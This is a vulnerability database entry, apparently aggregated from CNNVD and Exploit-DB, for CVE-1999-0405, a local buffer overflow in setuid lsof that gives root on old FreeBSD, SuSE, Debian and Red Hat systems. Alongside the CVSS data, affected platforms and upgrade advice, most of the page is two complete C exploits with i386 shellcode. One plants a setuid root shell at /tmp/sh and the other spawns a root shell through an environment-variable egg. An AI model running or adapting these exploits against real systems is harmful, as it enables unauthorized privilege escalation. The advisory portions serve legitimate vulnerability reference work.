CVE-1999-0405
CVSS 7.2
Published: 1999-02-18 00:00:00
Last revised: 2008-09-09 08:34:29

[Original] A buffer overflow in lsof allows local users to obtain root privilege.


[CNNVD] lsof Buffer Overflow Vulnerability (CNNVD-199902-037)

        lsof contains a buffer overflow vulnerability. A local user can exploit it to gain root privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:freebsd:freebsd:2.2.5        FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:2.1.7.1      FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:2.1.6        FreeBSD 2.1.6
cpe:/o:suse:suse_linux:4.3          SuSE Linux 4.3
cpe:/o:freebsd:freebsd:2.2.4        FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:3.2          FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0.5        FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:2.1.0        FreeBSD 2.1.0
cpe:/o:suse:suse_linux:4.4          SuSE Linux 4.4
cpe:/o:suse:suse_linux:5.3          SuSE Linux 5.3
cpe:/o:suse:suse_linux:4.2          SuSE Linux 4.2
cpe:/o:suse:suse_linux:5.0          SuSE Linux 5.0
cpe:/o:freebsd:freebsd:2.2.8        FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:3.1          FreeBSD 3.1
cpe:/o:debian:debian_linux:2.0.5    Debian Linux 2.0.5
cpe:/o:freebsd:freebsd:2.2.6        FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:3.0          FreeBSD 3.0
cpe:/o:redhat:linux:5.2::i386
cpe:/o:freebsd:freebsd:2.2.3        FreeBSD 2.2.3
cpe:/o:suse:suse_linux:6.1          SuSE Linux 6.1
cpe:/o:debian:debian_linux:2.0      Debian Linux 2.0
cpe:/o:suse:suse_linux:4.4.1        SuSE Linux 4.4.1
cpe:/o:freebsd:freebsd:2.1.5        FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:2.0          FreeBSD 2.0
cpe:/o:suse:suse_linux:6.0          SuSE Linux 6.0
cpe:/o:freebsd:freebsd:2.2.2        FreeBSD 2.2.2
cpe:/o:suse:suse_linux:5.1          SuSE Linux 5.1
cpe:/o:suse:suse_linux:5.2          SuSE Linux 5.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0405
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0405
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-037
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/3163
(UNKNOWN) OSVDB 3163

- Vulnerability information

lsof Buffer Overflow Vulnerability
High severity; Buffer overflow
1999-02-18 00:00:00 2005-05-02 00:00:00
Local
        lsof contains a buffer overflow vulnerability. A local user can exploit it to gain root privileges.

- Advisories and patches


- Vulnerability information (19373)

Debian Linux 2.0/2.0 r5, FreeBSD <= 3.2, OpenBSD 2.4, RedHat Linux 5.2 i386, S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (1) (EDBID:19373)
linux local
1999-02-17 Verified
0 c0nd0r
N/A
source: http://www.securityfocus.com/bid/496/info

Lsof is an open file management utility included with many Linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root privileges.

/*
 * Sekure SDI (Brazilian Information Security Team)
 * lsof local exploit for linux
 * by c0nd0r <condor@sekure.org>
 *
 * Security problem found by HERT. (www.hert.org)
 *
 * -> This little tool will bring you a suid or sgid shell owned by lsof
 *    user (root|kmem usually) at /tmp directory (/tmp/sh).
 *
 * -----------------------------------------------------------------------
 * Code explanation: We've used an unusual technique here.
 * The buffer allocated was too small for the standard expl, so we did a
 * little trick, by overflowing with 'A' till reaching the ret address and
 * then we've filled with NOP and the shellcode just after the modified
 * ret address. So we have a different exploit architecture:
 * [garbage][eip modified][lotsa NOP's][shellcode]
 * That's why we need a bigger offset.
 * -----------------------------------------------------------------------
 *
 * usage ( needa have a little brain):
 *  ./SDI-lsof <offset> (between 373-505)
 *
 * 4 phun - http://www.sekure.org
 * Thanks to jamez, dumped, bishop, bahamas, slide, falcon, vader
 * and guys at #uground (irc.brasnet.org network)
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* change the lsof path if it's needed */
#define PATH "/usr/bin/lsof"


/* i386 Linux payload: execve("/bin/sh", ["/bin/sh", "-c", "cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"]) */
char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";


/* Returns the current stack pointer; i386 only (the value left in %eax is the return value). */
unsigned long getsp ( void) {
  __asm__("mov %esp,%eax");
}

int main ( int argc, char *argv[]) {
  char b00m[220];
  long addr;
  int x, y, offset=380;

  if (argc > 1) offset = atoi(argv[1]);

  /* [garbage]: filler up to the saved return address */
  for (x = 0; x < 16; x++)
    b00m[x] = 'A';

  /* guessed address of the NOP sled that follows the overwritten return address */
  addr = getsp() + offset;
  printf ( "SDI-lsof exploiting at 0x%lx\n", addr);

  /* [eip modified]: little-endian return address */
  b00m[x++] = addr & 0x000000ff;
  b00m[x++] = (addr & 0x0000ff00) >> 8;
  b00m[x++] = (addr & 0x00ff0000) >> 16;
  b00m[x++] = (addr & 0xff000000) >> 24;

  /* [lotsa NOP's] */
  for ( ; x < 100; x++)
    b00m[x] = 0x90;

  /* [shellcode] */
  for (y = 0; y < strlen(shellcode); y++, x++)
    b00m[x] = shellcode[y];

  /* terminate right after the payload (the original used strlen() on the not-yet-terminated buffer) */
  b00m[x] = '\0';

  printf ( "\nFind a suid shell at /tmp/sh...\n\n");
  /* the oversized string is passed as the -u user list, the argument the overflow is in */
  execl ( PATH, PATH, "-u", b00m, (char *)0);
  perror ( "execl") ;
  return 1;
}


- Vulnerability information (19374)

Debian Linux 2.0/2.0 r5, FreeBSD <= 3.2, OpenBSD 2.4, RedHat Linux 5.2 i386, S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (2) (EDBID:19374)
linux local
1999-02-17 Verified
0 Zhodiac
N/A
source: http://www.securityfocus.com/bid/496/info

Lsof is an open file management utility included with many Linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root privileges.

/* http://www.hackersnetwork.net! */

/*
 *  Xploit for lsof 4.0.4 by Zhodiac <zhodiac@usa.net>
 *  Based on Aleph's article in phrack49
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE             32
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

/* i386 Linux execve("/bin/sh") payload from the phrack 49 article */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer; i386 only (the value left in %eax is the return value). */
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;
  char comando[512];

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  printf("\nXploit for lsof 4.04 by zhodiac <zhodiac@usa.net>\n\n");

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  /* guessed address of the egg, which sits in the environment of the child */
  addr = get_esp() - offset;
  printf("Using address: 0x%lx\n", addr);

  /* buff: the overflow string, filled entirely with the guessed address so
   * that whichever word lands on the saved return address points into the egg */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* egg: NOP sled followed by the shellcode */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* export the egg as EGG=... and pass the overflow string as the -u user list */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  snprintf(comando,511,"lsof -u %s",buff);
  system(comando);
  return 0;
}


- Vulnerability information

3163
lsof Unspecified Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

A local overflow exists in lsof (LiSt Open Files). Details on the function and exploitation were not provided. If exploited, root privileges could be gained.

- Timeline

1999-02-17 Unknown
1999-02-17 Unknown

- Solution

Upgrade to version 4.69 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete